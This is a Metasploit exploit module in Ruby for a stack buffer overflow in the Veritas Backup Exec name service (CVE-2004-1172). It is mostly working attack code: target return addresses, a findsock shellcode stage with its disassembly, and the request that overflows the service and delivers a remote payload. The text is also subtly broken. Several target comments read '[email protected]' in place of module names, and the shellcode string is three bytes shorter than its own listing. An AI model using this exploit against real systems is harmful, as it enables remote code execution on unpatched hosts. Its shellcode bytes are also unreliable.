Path: blob/master/modules/exploits/windows/backupexec/name_service.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the Veritas Backup Exec Agent Browser name service
# (CVE-2004-1172): a recv() into an undersized stack buffer reached through an
# over-long agent name in the registration request. The two-stage scheme is
# described in 'Description' below; the raw findsock stage is disassembled in
# the __END__ section at the bottom of this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Declares module metadata (name, references, payload constraints, targets)
  # and registers the single TCP option this module needs (RPORT, default 6101).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Name Service Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the Veritas Backup
          Exec Agent Browser service. This vulnerability occurs when a
          recv() call has a length value too long for the destination
          stack buffer. By sending an agent name value of 63 bytes or
          more, we can overwrite the return address of the recv
          function. Since we only have ~60 bytes of contiguous space
          for shellcode, a tiny findsock payload is sent which uses a
          hardcoded IAT address for the recv() function. This payload
          will then roll the stack back to the beginning of the page,
          recv() the real shellcode into it, and jump to it. This
          module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
          8.6.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1172'],
          [ 'OSVDB', '12418'],
          [ 'BID', '11974'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
        ],
        'Privileged' => true,
        # Constraints for the second stage, which #exploit sends down the
        # socket after the registration request (payload.encoded).
        'Payload' => {
          'Space' => 1024,
          'MinNops' => 512,
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{win},
        # 'Rets': only Rets[1] (the recv() IAT address, pre-shifted left 8 bits
        # so it contains no NUL bytes) is consumed by #exploit, where it is
        # patched into the findsock stage. Rets[0] is not referenced anywhere
        # in this file.
        'Targets' => [
          [
            'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
            {
              'Platform' => 'win',
              'Rets' => [ 0x0142ffa1, 0x401150FF ], # [email protected] v9.1.4691.0 | [email protected]
            },
          ],
          [
            'Veritas BE 8.5',
            {
              'Platform' => 'win',
              'Rets' => [ 0x014308b9, 0x401138FF ], # [email protected] v8.50.3572 | [email protected] v8.50.3572
            },
          ],
        ],
        'DisclosureDate' => '2004-12-16',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6101)
      ]
    )
  end

  # Connects to the name service, sends the oversized agent registration
  # request carrying the findsock stage, then streams the real payload down the
  # same socket and hands off to the handler.
  #
  # Both stage strings are mutated in place with []= below, so this file must
  # not enable frozen string literals.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # This will findsock/read the real shellcode (51 bytes, hardcoded IAT for recv)
    # The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
    # nulls: [0x00401150 -> 0x401150FF]
    # 112 filler bytes (0xfc) form the over-long agent name; the stage is
    # spliced into it at offset 2 below.
    stage_code = "\xfc" * 112
    stage_read =
      "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" +
      "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" +
      "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"

    # Configure the IAT for the recv call
    # Offset 29 is the imm32 operand of the `mov eax,...` at 0x1C in the __END__
    # listing (opcode byte B8 sits at offset 28); 'V' packs it little-endian.
    stage_read[29, 4] = [ target['Rets'][1] ].pack('V')

    # Stuff it all into one request
    stage_code[2, stage_read.length] = stage_read

    # Create the registration request
    # Layout as built here: 6 fixed header bytes, the agent name (stage_code),
    # a NUL, the literal string "1.1.1.1.1.1" plus NUL, and a 2-byte trailer.
    # The meaning of the header and trailer bytes is not documented in this file.
    req =
      "\x02\x00\x32\x00\x20\x00" + stage_code + "\x00" +
      "1.1.1.1.1.1\x00" + "\xeb\x81"

    print_status("Sending the agent registration request of #{req.length} bytes...")
    sock.put(req)

    # Per the module description, the stage recv()s the real payload from this
    # same socket, so the encoded payload is written right after the request.
    print_status("Sending the payload stage down the socket...")
    sock.put(payload.encoded)

    print_status("Waiting for the payload to execute...")
    # Kernel#select with no descriptors is used here as a 2-second sleep.
    select(nil, nil, nil, 2)

    handler
    disconnect
  end
end


__END__
[ findsock stage ]
00000000  31F6              xor esi,esi
00000002  C1EC0C            shr esp,0xc
00000005  C1E40C            shl esp,0xc
00000008  89E7              mov edi,esp
0000000A  89FB              mov ebx,edi
0000000C  6A01              push byte +0x1
0000000E  8B7424FE          mov esi,[esp-0x2]
00000012  31D2              xor edx,edx
00000014  52                push edx
00000015  42                inc edx
00000016  C1E210            shl edx,0x10
00000019  52                push edx
0000001A  57                push edi
0000001B  56                push esi
0000001C  B8FF501140        mov eax,0x401150ff
00000021  C1E808            shr eax,0x8
00000024  FF10              call near [eax]
00000026  85C0              test eax,eax
00000028  7907              jns 0x31
0000002A  89DC              mov esp,ebx
0000002C  4E                dec esi
0000002D  85F6              test esi,esi
0000002F  75E1              jnz 0x12
00000031  FFD7              call edi